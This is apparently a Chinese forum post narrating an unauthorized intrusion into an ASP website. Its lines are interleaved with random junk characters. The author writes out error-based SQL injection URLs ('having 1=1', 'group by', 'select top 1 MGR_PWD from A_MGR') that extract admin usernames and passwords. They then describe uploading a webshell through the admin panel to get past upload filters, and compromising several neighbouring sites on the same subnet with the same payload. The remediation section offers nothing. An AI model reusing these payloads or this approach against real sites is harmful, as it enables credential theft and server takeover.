发现一个注入点
, J2 ] B/ u3 I' x' Q+ Jhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389$ D; v9 k1 v* T' K/ ^
; \" z! `; I. c: x( W0 O( \习惯性的加’having1=1--
( T" y/ Z( a3 i r* I* i" q# l) ^- m; f. Y! F
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) w9 o0 s2 Z. Z: Y; C$ G2 r( f' O+ T# j' ^ k; {* T1 I X' S
0+ M) {7 S, u: i8 ?" j! `
7 B- |& y& W! J8 R3 r# G' R
爆出Diary_A.dl_Title(这时候很激动啊)) }# b ]' ]7 U4 \6 w f6 L
! d! Y; c( y0 ]% P1 X2 K) ` V: P那么继续
7 |9 z/ A, ~) ?2 c' A% uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
& D# N7 w, n+ I( v: y7 K8 ~
+ A% _/ l& f% v3 r/ f继续,一直爆下去
2 T% C; G1 }2 d. n8 _) ]
, A: K& `4 _6 Z+ }9 a1 ~/ G爆到几个字段和表段 但是没找到需要的管理用户的字段
3 I9 ]+ T1 ?0 ]9 H# q+ T9 N- V
蛋疼了 怎么办 然后去后台登陆页看源码1 K J" X7 |. x* b( ~
5 E! H+ ~/ p' V) T0 N6 z* U" h$ E
0
& ?% {9 q( Q% j2 j2 j
7 J0 h) j3 X; m/ N8 [Input name= “ADUID”
: P# x+ I) p+ c: _Input name= “ADPWD”
1 I# S, {, C) v, F
/ Z+ k( ~0 B& \- [很幸运 找到了字段那就继续
, C& Z* g& X+ L W3 V找到之后开始爆用户
! s2 P8 i+ P4 ]2 r, Ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—3 Z- D( A: b5 ^
爆密码
8 j7 R+ `0 g. E, mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—( _3 \! u6 @6 m" S% H! `5 _
测试了下 这个注入点只能爆到文章哪里的表 : l" T7 F8 x E0 n, b* h& b
- h( s" y5 ]4 x: ^2 n
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了- P2 Q1 X, r( E8 ^9 b0 J$ y
4 V* v( G) }! P
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
! ^# O2 b* z" L. `0 q' y! f8 h5 l$ h% S+ p* X
473! O8 a8 E, D4 [( S* ?( f6 j
$ p$ K2 Q" S: Z8 \/ v" |' H+ s4 h进后台2 d) } ^. T) ]. ~$ H" q, V
, K0 x: t0 P- S* u5 F2 Z- o4 p
% w# n8 m0 N0 H6 N发现几个上传点 有的地方不能上传 而且防止恶意代码
. y; v, n3 T1 ^& t1 c1 A$ K. {' L1 T
没办法 各种百度各种找大牛 找到一只好像可以突破的马$ c6 {1 [* d( d/ A3 J, n1 T) G
* m) j$ Z" ^4 x5 }1 [; }1 q3 q+ n6 d/ X0 }6 K+ y
在系统管理那里直接上传 不过没有显示地址
) A" d3 [$ g p( C9 Y; ]. V/ |, R) {
/ K( N& Q- N/ f9 h再上传一次 抓包 搞定OK
) m- `, f" y5 w) P$ \$ k& g' z" }; D& e
( c0 W/ s \/ _9 R3 Z
. J; a. x; P; ]. s; D: O472( Y5 D& {+ s0 T/ Y& g# [$ R
" t5 w0 d) M9 A
晚上不行了 去睡觉。。。
9 [& c& c1 R3 X% ~( z4 p4 x第二天刚起床 闲的没事做继续日站吧
" | V. ]( {; B6 f' M4 x$ Y) t' k$ I4 D8 j; [/ Y
找个站 就把这个站的旁c扫了下
! i& U4 r7 O6 `6 g" B, u" ]
7 ~0 c) D4 Q% {' W/ U# M0 d发现c段也有一个购物站 ,然后还和这个站的模板差不多 q2 i/ m% r& J' |
4 _. ^ C, N: y6 o就找到会员登录口测试; d. q h/ y+ N5 t2 R' i( _
% t7 I, z- r8 h& H4 i'and (select top 1 MGR_UID from A_MGR)>0—: Q: a' Y: N8 ]# W
果断爆到了 这时候我很激动 通杀
( V* f2 t3 K |
2 z, \, M! k/ ]) h4 w% p; c再次翻c段8 m' G- L6 R# ]! d8 z' W9 _3 l
( J6 L8 b3 M) h$ e$ @ |
翻出几个站 都成功拿下
( v0 ?$ z2 c. t/ z$ g. V
- U9 I9 o: K/ l/ T
" S9 t" @0 Y% z9 m* r' R
* {# c* | V8 r- F4 @+ N0 V修复方案:, Q+ Z4 n" o/ v7 `5 E. X* `+ t
他们比我专业 # J- d0 \; q p+ C
0 t; Y- e0 j7 Y4 d( U5 `0 w( @+ @& q& W5 u7 x5 d
. }$ v" h, e; D) h: u
|